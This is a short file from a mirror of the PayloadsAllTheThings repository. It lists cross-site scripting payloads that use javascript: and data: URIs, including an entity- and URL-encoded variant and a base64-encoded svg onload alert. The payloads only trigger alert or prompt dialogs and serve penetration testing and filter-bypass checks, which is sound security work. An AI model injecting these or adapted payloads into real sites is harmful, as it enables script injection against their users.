mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
13 lines
No EOL
406 B
Markdown
13 lines
No EOL
406 B
Markdown
XSS with javascript:
|
|
```
|
|
javascript:prompt(1)
|
|
|
|
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
|
|
|
|
javascript:confirm(1)
|
|
```
|
|
|
|
XSS with data:
|
|
```
|
|
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
|
``` |